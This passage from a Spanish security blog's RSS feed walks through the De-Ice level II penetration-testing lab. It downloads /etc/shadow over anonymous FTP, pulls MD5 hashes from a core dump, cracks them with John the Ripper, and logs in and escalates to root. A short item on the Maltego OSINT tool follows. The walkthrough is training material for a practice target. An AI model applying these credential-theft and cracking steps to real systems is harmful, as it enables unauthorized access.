<p style="text-align: justify;">Acá debemos explorar en detalle el contenido de cada uno de estos directorios con la finalidad de encontrar información relevante que permita elevar privilegios en el sistema. Cada persona será libre de elegir el directorio por el cual comenzar, pero recomiendo hacerlo con los directorios que revelan más información del sistema. Para este caso el directorio /etc.</p>
<p style="text-align: justify;"><strong>ftp&gt; cd etc</strong><br />
250 Directory successfully changed.<br />
<strong>ftp&gt; ls</strong><br />
200 PORT command successful. Consider using PASV.<br />
150 Here comes the directory listing.<br />
drwxr-xr-x    4 1000     513           160 Mar 15  2007 X11<br />
-rw-r&#8211;r&#8211;    1 1000     513        362436 Mar 03  2007 core<br />
drwxr-xr-x    2 1000     513           100 Mar 15  2007 fonts<br />
-rw-r&#8211;r&#8211;    1 1000     513           780 Apr 30  2005 hosts<br />
-rw-r&#8211;r&#8211;    1 1000     513           718 Jul 03  2005 inputrc<br />
-rw-r&#8211;r&#8211;    1 1000     513          1296 Jun 10  2006 issue<br />
-rw-r&#8211;r&#8211;    1 1000     513           183 Jun 23  2005 lisarc<br />
-rw-r&#8211;r&#8211;    1 1000     513            56 Oct 21  2004 localtime<br />
lrwxrwxrwx    1 1000     513            23 Feb 18 06:16 localtime-copied-from -&gt; /usr/share/zoneinfo/GMT<br />
-rw-r&#8211;r&#8211;    1 1000     513         10289 Dec 31  2003 login.defs<br />
-rw-r&#8211;r&#8211;    1 1000     513             1 Dec 31  2003 motd-slax<br />
drwxr-xr-x    2 1000     513           100 Mar 15  2007 profile.d<br />
drwxr-xr-x    2 1000     513           220 Mar 15  2007 rc.d<br />
-rw-r&#8211;r&#8211;    1 1000     513           440 Jul 18  2006 shadow<br />
226 Directory send OK.</p>
<p style="text-align: justify;">Recomiendo además ir realizando la descarga de los archivos y directorios que consideremos de interés para el Test de Penetración. Para ello basta ejecutar la siguiente instrucción:</p>
<p style="text-align: justify;"><strong>get name_file</strong></p>
<p style="text-align: justify;">En este caso quedaría así:</p>
<p style="text-align: justify;"><strong>ftp&gt; get shadow</strong><br />
local: shadow remote: shadow<br />
200 PORT command successful. Consider using PASV.<br />
150 Opening BINARY mode data connection for shadow (440 bytes).<br />
226 File send OK.<br />
440 bytes received in 0.00 secs (1761.0 kB/s)</p>
<p style="text-align: justify;">Una vez descargados y analizados los archivos procedemos a utilizar los resultados obtenidos en dicho análisis.</p>
<p style="text-align: justify;">Entre los archivos descargados y analizados podemos encontrar varios de mucho interés que deben ser tenidos en cuenta.</p>
<p style="text-align: justify;">Uno de ellos es el archivo shadow almacenado en el directorio /etc</p>
<p style="text-align: justify;"><strong>root@bt:~/De-Ice_II# cat shadow</strong><br />
root:$1$3OF/pWTC$lvhdyl86pAEQcrvepWqpu.:12859:0:::::<br />
bin:*:9797:0:::::<br />
daemon:*:9797:0:::::<br />
adm:*:9797:0:::::<br />
lp:*:9797:0:::::<br />
sync:*:9797:0:::::<br />
shutdown:*:9797:0:::::<br />
halt:*:9797:0:::::<br />
mail:*:9797:0:::::<br />
news:*:9797:0:::::<br />
uucp:*:9797:0:::::<br />
operator:*:9797:0:::::<br />
games:*:9797:0:::::<br />
ftp:*:9797:0:::::<br />
smmsp:*:9797:0:::::<br />
mysql:*:9797:0:::::<br />
rpc:*:9797:0:::::<br />
sshd:*:9797:0:::::<br />
gdm:*:9797:0:::::<br />
pop:*:9797:0:::::<br />
nobody:*:9797:0:::::</p>
<p style="text-align: justify;">Podríamos intentar un ataque de fuerza bruta para descifrar la contraseña de root, pero si observamos en detalle el mismo, podemos deducir que este no corresponde al sistema objetivo, pues no presenta los posibles usuarios administradores del sistema identificados en la primera fase del Test de Penetración.</p>
<p style="text-align: justify;">Contact information for admins is as follows:<br />
Sr. System Admin: Adam Adams &#8211; adamsa@herot.net<br />
System Admin (Intern): Bob Banter &#8211; banterb@herot.net<br />
System Admin: Chad Coffee &#8211; coffeec@herot.net</p>
<p style="text-align: justify;">De otro lado fue decisivo encontrar un archivo conocido como <a href="http://en.wikipedia.org/wiki/Core_dump" target="_blank"><strong>CORE</strong></a></p>
<p style="text-align: justify;"><strong>root@bt:~/De-Ice_II# ls</strong><br />
<strong>core </strong> rc.FireWall  rc.S    rc.inet1  rc.slaxconfig  shadow<br />
rc.6  rc.M         rc.gpm  rc.slax   root</p>
<p style="text-align: justify;">Los archivos core son generados (volcados de memoria) a raiz de fallos o crash del sistema. Estos contienen información referente al estado de memoría y del sistema, además de contener información relacionada al aplicativo que generó dicho crash. (<a href="http://en.wikipedia.org/wiki/Core_dump" target="_blank"><strong>Más información&gt;&gt;</strong></a>)</p>
<p style="text-align: justify;">Veamos los strings de dicho archivo:</p>
<p style="text-align: justify;">&#8230; (Final del archivo core)</p>
<address style="text-align: justify;">root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::<br />
bin:*:9797:0:::::<br />
daemon:*:9797:0:::::</address>
<address style="text-align: justify;">adm:*:9797:0:::::<br />
lp:*:9797:0:::::</address>
<address style="text-align: justify;">sync:*:9797:0:::::</address>
<address style="text-align: justify;">shutdown:*:9797:0:::::</address>
<address style="text-align: justify;">halt:*:9797:0:::::</address>
<address style="text-align: justify;">mail:*:9797:0:::::</address>
<address style="text-align: justify;">news:*:9797:0:::::</address>
<address style="text-align: justify;">uucp:*:9797:0:::::</address>
<address style="text-align: justify;">operator:*:9797:0:::::</address>
<address style="text-align: justify;">games:*:9797:0:::::</address>
<address style="text-align: justify;">ftp:*:9797:0:::::</address>
<address style="text-align: justify;">smmsp:*:9797:0:::::</address>
<address style="text-align: justify;">mysql:*:9797:0:::::</address>
<address style="text-align: justify;">rpc:*:9797:0:::::</address>
<address style="text-align: justify;">sshd:*:9797:0:::::</address>
<address style="text-align: justify;">gdm:*:9797:0:::::</address>
<address style="text-align: justify;">pop:*:9797:0:::::</address>
<address style="text-align: justify;">nobody:*:9797:0:::::</address>
<address style="text-align: justify;">aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::</address>
<address style="text-align: justify;">bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::</address>
<address style="text-align: justify;">ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::</address>
<p style="text-align: justify;">Una vez identificados los usuarios válidos del sistema procedamos a descifrar sus contraseñas.</p>
<p style="text-align: justify;">Hagamos uso de <a href="http://es.wikipedia.org/wiki/John_the_Ripper" target="_blank"><strong>john the ripper</strong></a></p>
<p style="text-align: justify;"><strong>root@bt:~/Sec-Track/info/john-1.7.4.2/run# ./john</strong><br />
John the Ripper password cracker, version 1.7.4.2<br />
Copyright (c) 1996-2010 by Solar Designer and others<br />
Homepage: http://www.openwall.com/john/</p>
<p>Usage: john [OPTIONS] [PASSWORD-FILES]<br />
&#8211;single                   &#8220;single crack&#8221; mode<br />
&#8211;wordlist=FILE &#8211;stdin    wordlist mode, read words from FILE or stdin<br />
&#8211;rules                    enable word mangling rules for wordlist mode<br />
&#8211;incremental[=MODE]       &#8220;incremental&#8221; mode [using section MODE]<br />
&#8211;external=MODE            external mode or word filter<br />
&#8211;stdout[=LENGTH]          just output candidate passwords [cut at LENGTH]<br />
&#8211;restore[=NAME]           restore an interrupted session [called NAME]<br />
&#8211;session=NAME             give a new session the NAME<br />
&#8211;status[=NAME]            print status of a session [called NAME]<br />
&#8211;make-charset=FILE        make a charset, FILE will be overwritten<br />
&#8211;show                     show cracked passwords<br />
&#8211;test[=TIME]              run tests and benchmarks for TIME seconds each<br />
&#8211;users=[-]LOGIN|UID[,..]  [do not] load this (these) user(s) only<br />
&#8211;groups=[-]GID[,..]       load users [not] of this (these) group(s) only<br />
&#8211;shells=[-]SHELL[,..]     load users with[out] this (these) shell(s) only<br />
&#8211;salts=[-]COUNT           load salts with[out] at least COUNT passwords only<br />
&#8211;format=NAME              force hash type NAME: DES/BSDI/MD5/BF/AFS/LM<br />
&#8211;save-memory=LEVEL        enable memory saving, at LEVEL 1..3</p>
<p style="text-align: justify;">Comenzaré utilizando el diccionario básico que incluye el mismo john the ripper, según los resultados obtenidos aumentaré la complejidad de los diccionarios.</p>
<p style="text-align: justify;">&#8230;</p>
<p style="text-align: justify;">Con diccionarios básicos no he tenido buenos resultados&#8230; Por ello utilicé un diccionario más complejo que me va arrojando los siguientes resultados:</p>
<p style="text-align: justify;"><strong>C:\Users\4v4t4r\Downloads\john171w\john1701\run&gt;john-386.exe users.txt &#8211;wordlist=dic.lst<br />
</strong><br />
Loaded 4 password hashes with 4 different salts (FreeBSD MD5 [32/32])<br />
guesses: 0  time: 0:00:00:33 1%  c/s: 5559  trying: Jagdgesetze<br />
guesses: 0  time: 0:00:00:54 1%  c/s: 5561  trying: Unberechenbarke<br />
guesses: 0  time: 0:00:01:36 3%  c/s: 5508  trying: pingelige<br />
guesses: 0  time: 0:00:02:38 5%  c/s: 5528  trying: de&#8217;mante`lerai<br />
guesses: 0  time: 0:00:03:27 6%  c/s: 5534  trying: radioreportages<br />
guesses: 0  time: 0:00:06:14 10%  c/s: 5528  trying: seccature<br />
guesses: 0  time: 0:00:07:06 12%  c/s: 5527  trying: ik{iseni<br />
guesses: 0  time: 0:00:13:50 25%  c/s: 5502  trying: cvakaly<br />
guesses: 0  time: 0:00:14:21 26%  c/s: 5503  trying: nejnevycvicenej<br />
guesses: 0  time: 0:00:19:14 33%  c/s: 5483  trying: myjv<br />
guesses: 0  time: 0:00:21:18 36%  c/s: 5483  trying: villaje<br />
<strong>Complexity       (root)</strong><br />
guesses: 1  time: 0:00:21:39 37%  c/s: 5483  trying: Beintema<br />
guesses: 1  time: 0:00:24:09 42%  c/s: 5474  trying: walesa</p>
<p style="text-align: justify;">Encontrado el password de root (Y) de todas maneras la dejo seguir, con el objetivo de descifrar los demás passwords.</p>
<p style="text-align: justify;"><strong>Finalmente y luego de 40 minutos obtuvimos lo siguiente:</strong></p>
<p style="text-align: justify;">C:\Users\4v4t4r\Downloads\john171w\john1701\run&gt;john-386.exe users.txt &#8211;wordlis<br />
t=dic.lst<br />
Loaded 4 password hashes with 4 different salts (FreeBSD MD5 [32/32])<br />
guesses: 0  time: 0:00:00:33 1%  c/s: 5559  trying: Jagdgesetze<br />
guesses: 0  time: 0:00:00:54 1%  c/s: 5561  trying: Unberechenbarke<br />
guesses: 0  time: 0:00:01:36 3%  c/s: 5508  trying: pingelige<br />
guesses: 0  time: 0:00:02:38 5%  c/s: 5528  trying: de&#8217;mante`lerai<br />
guesses: 0  time: 0:00:03:27 6%  c/s: 5534  trying: radioreportages<br />
guesses: 0  time: 0:00:06:14 10%  c/s: 5528  trying: seccature<br />
guesses: 0  time: 0:00:07:06 12%  c/s: 5527  trying: ik{iseni<br />
guesses: 0  time: 0:00:13:50 25%  c/s: 5502  trying: cvakaly<br />
guesses: 0  time: 0:00:14:21 26%  c/s: 5503  trying: nejnevycvicenej<br />
guesses: 0  time: 0:00:19:14 33%  c/s: 5483  trying: myjv<br />
guesses: 0  time: 0:00:21:18 36%  c/s: 5483  trying: villaje<br />
<strong>Complexity       (root)</strong><br />
guesses: 1  time: 0:00:21:39 37%  c/s: 5483  trying: Beintema<br />
guesses: 1  time: 0:00:24:09 42%  c/s: 5474  trying: walesa<br />
<strong>Zymurgy          (bbanter)</strong><br />
guesses: 2  time: 0:00:35:35 76%  c/s: 5446  trying: Nachkriegspolit<br />
guesses: 2  time: 0:00:38:15 85%  c/s: 5444  trying: ritornato<br />
guesses: 2  time: 0:00:39:13 88%  c/s: 5442  trying: skrigen<br />
guesses: 2  time: 0:00:41:43 97%  c/s: 5448  trying: vozidlech<br />
guesses: 2  time: 0:00:42:30 100%  c/s: 5449  trying: ovrigt</p>
<p style="text-align: justify;">Confirmemos entonces el acceso al sistema con los usuarios encontrados:</p>
<p style="text-align: justify;"><strong>login as: root</strong><br />
root@192.168.1.110&#8242;s password:<br />
Access denied<br />
root@192.168.1.110&#8242;s password:</p>
<p style="text-align: justify;">Acceso denegado para login remoto como root en el sistema&#8230; Probemos entonces a iniciar con bbanter y elevar privilegios como root (su):</p>
<p style="text-align: justify;"><strong>login as: bbanter</strong><br />
bbanter@192.168.1.110&#8242;s password:<br />
Linux 2.6.16.<br />
bbanter@slax:~$ su<br />
Password: **********<br />
root@slax:/home/bbanter#</p>
<p style="text-align: justify;">Hemos conseguido ingresar al sistema con todos los privilegios&#8230; En el próximo post exploraremos el sistema en busca de información confidencial que comprometa la seguridad de la empresa objetivo&#8230;</p>
<p style="text-align: justify;">
<p style="text-align: justify;">
<p style="text-align: justify;">
<address style="text-align: justify;"> </address>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/desarrollo-del-entorno-de-ice-nivel-ii-%e2%80%93-acceso-al-sistema-y-elevacion-de-privilegios/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tool: Maltego, Herramienta de Inteligencia, Análisis Forense y Recolección de Información</title>
		<link>http://www.sec-track.com/tool-maltego-herramienta-de-inteligencia-analisis-forense-y-recoleccion-de-informacion</link>
		<comments>http://www.sec-track.com/tool-maltego-herramienta-de-inteligencia-analisis-forense-y-recoleccion-de-informacion#comments</comments>
		<pubDate>Wed, 10 Feb 2010 11:17:44 +0000</pubDate>
		<dc:creator>S3cTr4ck</dc:creator>
				<category><![CDATA[Análisis Forense Digital]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Forensics]]></category>
		<category><![CDATA[Informática Forense]]></category>
		<category><![CDATA[Information Gathering]]></category>
		<category><![CDATA[Maltego]]></category>
		<category><![CDATA[Penetration Test]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=419</guid>
		<description><![CDATA[La herramienta Maltego (desarrollada por Paterva) es una herramienta que permite realizar recolecciones de información en Internet así como la representación de la misma en formatos fáciles de interpretar. Maltego hace uso de varias librerías gráficas que permiten identificar las relaciones entre la información que se está consultando en los diferentes motores de búsqueda que [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">La herramienta <a href="http://www.paterva.com/web4/index.php/client/community-edition" target="_blank"><strong>Maltego</strong></a> (desarrollada por <a href="http://www.paterva.com" target="_blank"><strong>Paterva</strong></a>) es una herramienta que permite realizar recolecciones de información en Internet así como la representación de la misma en formatos fáciles de interpretar.</p>
<p style="text-align: justify;"><span id="more-419"></span><a href="http://www.paterva.com/web4/index.php/client/community-edition" target="_blank"><strong>Maltego</strong></a> hace uso de varias librerías gráficas que permiten identificar las relaciones entre la información que se está consultando en los diferentes motores de búsqueda que implementa, permitiendo de esta manera organizar todo un mapa de relaciones entre resultados.</p>
<p style="text-align: justify;"><a href="http://www.paterva.com/web4/index.php/client/community-edition" target="_blank"><strong></strong></a><a href="http://www.paterva.com/web4/index.php/client/community-edition" target="_blank"><strong>Maltego</strong></a> puede ser descargada de manera gratuita (<strong><a href="http://www.paterva.com/web4/index.php/client/community-edition" target="_blank">Community Edition</a></strong>) para sistemas Windows y Linux, además ofrece una versión comercial, (<a href="http://www.paterva.com/web4/index.php/client/commercial-edition" target="_blank"><strong>Comercial Edition</strong></a>) la cual entre otras bondades, permite realizar búsquedas aun más profundas y exportar y/o salvar los resultados obtenidos.</p>
<p style="text-align: justify;"><a href="http://www.paterva.com/web4/index.php/client/community-edition" target="_blank">Maltego</a> viene incluía en <a href="http://www.sec-track.com/tag/backtrack" target="_blank"><strong>BackTrack</strong></a> y nos permitirá entonces enumerar la  información referente a redes, dominios, personas, emails y datos  personales. Algunos de estos datos son:</p>
<ul style="text-align: justify;">
<li>Nombres de dominio</li>
<li>Información WHOIS</li>
<li>Nombres DNS</li>
<li>Bloques de red</li>
<li>Direcciones IP</li>
<li>Dirección de correo electrónico asociada con un nombre de persona</li>
<li>Sitios web asociados con un nombre de persona</li>
<li>Números telefónicos asociados con un nombre de persona</li>
<li>Grupos sociales que están asociados con un nombre de persona</li>
<li>Compañías y organizaciones asociadas con un nombre de persona</li>
<li>Hacer una verificación simple de las direcciones de correo  electrónico</li>
<li>Búsqueda de blogs y referencias por frases</li>
<li>Identificar vínculos entrantes para sitios web</li>
<li>Extraer metadatos desde archivos y fuentes de dominios</li>
</ul>
<p style="text-align: justify;">Veamos un ejemplo de consulta a la web del proyecto Sec-Track:</p>
<p style="text-align: justify;"><img class="aligncenter" title="Maltego" src="http://img203.imageshack.us/img203/5858/maltego.jpg" alt="" width="450" height="317" /></p>
<p style="text-align: justify;">En la imagen se puede observar como realicé una consulta por el sitio Web Sec-Track, a partir de allí obtenemos datos como el dominio de la web, la dirección IP, Correos electrónicos publicados, enlaces, etc&#8230;</p>
<p style="text-align: justify;"><strong><a href="http://www.paterva.com/web4/index.php/client/community-edition" target="_blank">Para más información y descarga de la herramienta, visita la página oficial del proyecto Maltego</a>.</strong></p>
<p style="text-align: justify;">Pronto seguiré con varios post relacionados al uso específico de esta genial herramienta.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/tool-maltego-herramienta-de-inteligencia-analisis-forense-y-recoleccion-de-informacion/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>
